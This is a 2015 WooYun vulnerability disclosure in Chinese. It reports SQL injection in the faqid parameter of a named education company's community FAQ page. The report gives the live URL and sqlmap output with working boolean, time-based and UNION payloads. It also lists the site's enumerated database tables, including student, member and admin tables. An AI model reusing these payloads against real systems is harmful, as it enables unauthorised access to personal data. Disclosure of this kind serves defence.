当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160102

漏洞标题:大连东财科技某站存在SQL注入漏洞

相关厂商:edufe.com.cn

漏洞作者: 路人甲

提交时间:2015-12-11 11:16

修复时间:2015-12-16 11:18

公开时间:2015-12-16 11:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://community.edufe.com.cn/faq/index.php?faqid=26

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: faqid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: faqid=26 AND 1465=1465
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: faqid=26 AND (SELECT * FROM (SELECT(SLEEP(5)))izHA)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: faqid=26 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71766a7071,0x4550524a625963476477,0x716a6a7671),NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: PHP 5.2.6, Nginx
back-end DBMS: MySQL 5.0.12
Database: cc_phpcms
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| phpcms_ads_stat | 256361 |
| activity_registerinfo | 231938 |
| student | 152303 |
| activity_responsibility | 150774 |
| phpcms_keyword | 63697 |
| edufe_search | 23252 |
| phpcms_log | 18881 |
| phpcms_hits | 18230 |
| activity_assesslog | 17585 |
| phpcms_content_tag | 15491 |
| activity_log | 14764 |
| phpcms_cache_count | 13738 |
| phpcms_content_count | 11664 |
| phpcms_c_news | 11654 |
| phpcms_content | 11650 |
| phpcms_attachment | 8236 |
| post_temp | 2076 |
| activity_productappr | 2039 |
| activity_product | 2020 |
| phpcms_space_article | 1893 |
| phpcms_space_comment | 1807 |
| phpcms_member_info | 982 |
| phpcms_member | 979 |
| phpcms_member_detail | 963 |
| phpcms_comment | 880 |
| phpcms_copyfrom | 528 |
| activity_tag | 434 |
| phpcms_content_position | 407 |
| phpcms_member_group_priv | 393 |
| phpcms_space_blog | 304 |
| phpcms_menu | 273 |
| phpcms_space_photo | 251 |
| phpcms_admin_role_priv | 159 |
| phpcms_model_field | 131 |
| phpcms_message | 130 |
| phpcms_session | 92 |
| phpcms_vote_option | 84 |
| phpcms_vote_useroption | 63 |
| phpcms_area | 59 |
| phpcms_vote_data | 58 |
| activity_prodjudge | 27 |
| phpcms_vote_subject | 27 |
| phpcms_avatars | 24 |
| phpcms_space_type | 24 |
| activity_itemprize | 22 |
| phpcms_author | 22 |
| magazine_image | 21 |
| phpcms_category | 21 |
| phpcms_process_status | 21 |
| magazine_article | 19 |
| activity_itemmanager | 18 |
| phpcms_space_album | 18 |
| activity_affiche | 17 |
| phpcms_faq | 17 |
| phpcms_space_ctype | 16 |
| phpcms_search | 15 |
| phpcms_module | 13 |
| phpcms_space_template | 12 |
| phpcms_urlrule | 12 |
| phpcms_admin_role | 11 |
| phpcms_space_photo_comment | 11 |
| phpcms_space_position | 11 |
| phpcms_admin | 10 |
| phpcms_block | 10 |
| phpcms_status | 9 |
| activity_set | 7 |
| phpcms_member_group | 6 |
| phpcms_model | 6 |
| phpcms_process | 6 |
| phpcms_role | 6 |
| phpcms_position | 5 |
| magazine_info | 4 |
| phpcms_link | 4 |
| phpcms_type | 4 |
| activity_productstate | 3 |
| activity_userrole | 3 |
| phpcms_ads | 3 |
| phpcms_search_type | 3 |
| phpcms_workflow | 3 |
| activity_itemtype | 2 |
| phpcms_ads_place | 2 |
| phpcms_datasource | 2 |
| phpcms_space | 2 |
| phpcms_space_api | 2 |
| activity_filetcomm | 1 |
| magazine_type | 1 |
| phpcms_editor_data | 1 |
| search_counter | 1 |
+----------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-16 11:18

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价